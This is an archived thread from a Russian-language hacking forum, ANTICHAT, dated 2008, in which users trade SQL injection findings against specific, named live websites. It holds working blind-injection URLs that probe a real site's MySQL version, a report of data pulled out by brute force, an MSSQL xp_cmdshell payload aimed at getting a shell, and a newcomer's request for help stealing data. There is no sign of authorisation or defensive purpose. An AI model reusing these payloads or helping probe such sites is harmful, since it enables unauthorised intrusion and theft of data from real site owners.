ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.01.2008, 17:14
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
"флудить" больше не буду, но мнения разделились))
все же интересный сайт
|
|
|
09.01.2008, 17:20
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от Spyder
да нету там скули
Есть 
|
|
|
|
10.01.2008, 09:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
Сообщение от big_BRAT
mysql там точно не 3!!!
так и я вот и думаю, нутром чую что там иньекция но раскрутить не могу(
там 3 мускул, если что.
Сообщение от Spyder
да нету там скули
Сообщение от Macro
Вроде скуль, но она странная. Возможно, что там mysql 3
извините, вы как это определяете? у Spyder интуиция +10, а у Macro +15?  срочно читать вульфа с р57 
Код:
http://spec.proclub.ru/modules/tests/test/courses/course1.php?course=27'+and(ascii(substring(version(),1,1))>52)/*
Код:
http://spec.proclub.ru/modules/tests/test/courses/course1.php?course=27'+and(ascii(substring(version(),1,1))>51)/*
=>
Код:
http://spec.proclub.ru/modules/tests/test/courses/course1.php?course=27'+and(ascii(substring(version(),1,1))=52)/*
__________________
ПИУ-ПИУ...
|
|
|
|
10.01.2008, 09:36
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от c411k
извините, вы как это определяете? у Spyder интуиция +10, а у Macro +15? срочно читать вульфа с р57 Я давал пример, показывающий, что скуль есть. Я просто забыл запрос, чтобы узнать, что это mysql 3, поэтому и написал другое
Гг спасибо наконец объяснил
|
|
|
|
10.01.2008, 14:55
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
всем спасибо /отд. Scipio/, все нужные данные вытащил перебором, заодно переписал утилиту от Elekt'а под себя, так сказать на будущее.
Последний раз редактировалось big_BRAT; 10.01.2008 в 15:41..
|
|
|
|
20.01.2008, 20:40
|
|
Участник форума
Регистрация: 05.07.2006
Сообщений: 285
Провел на форуме:
3295822
Репутация:
117
|
|
Всем привет. Подскажите что за странная бага: http://planetadisser.com/agrarian'/
PS там фигурирует ип так что лучше шифрануться
|
|
|
|
26.01.2008, 22:34
|
|
Новичок
Регистрация: 17.01.2008
Сообщений: 2
Провел на форуме:
78542
Репутация:
3
|
|
Господа хакеры, я немного нубоват в этом деле, но как провести sql инъекцию? Мне друг посоветовал этот сайт, и сказал, что тут помогут. Мне нужно читать секретки, и скачивать файлы ЭТОГО форума. Буду очень благодарен за помощь. Если что пишите по асе: 430844318 |
|
|
|
29.01.2008, 03:41
|
|
Новичок
Регистрация: 27.01.2008
Сообщений: 1
Провел на форуме:
23534
Репутация:
0
|
|
нужно получить шелл через MSSQL.
при запросе ?id=1'); exec master..xp_cmdshell 'dir'-- выдает [Microsoft][ODBC SQL Server Driver]Connection is busy with results for another hstmt
какие есть варианты? В базе логин пассов нет.
|
|
|
|
30.01.2008, 15:04
|
|
Новичок
Регистрация: 11.01.2007
Сообщений: 2
Провел на форуме:
311386
Репутация:
3
|
|
http://www.shinovozoff.ru/radio_cassette_player/product/?Product=-m100
Сие есть sql-inj?
|
|
|
|
30.01.2008, 15:20
|
|
Участник форума
Регистрация: 05.07.2006
Сообщений: 285
Провел на форуме:
3295822
Репутация:
117
|
|
Сообщение от NiLSoN
http://www.shinovozoff.ru/radio_cassette_player/product/?Product=-m100
Сие есть sql-inj?
Похоже нет.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
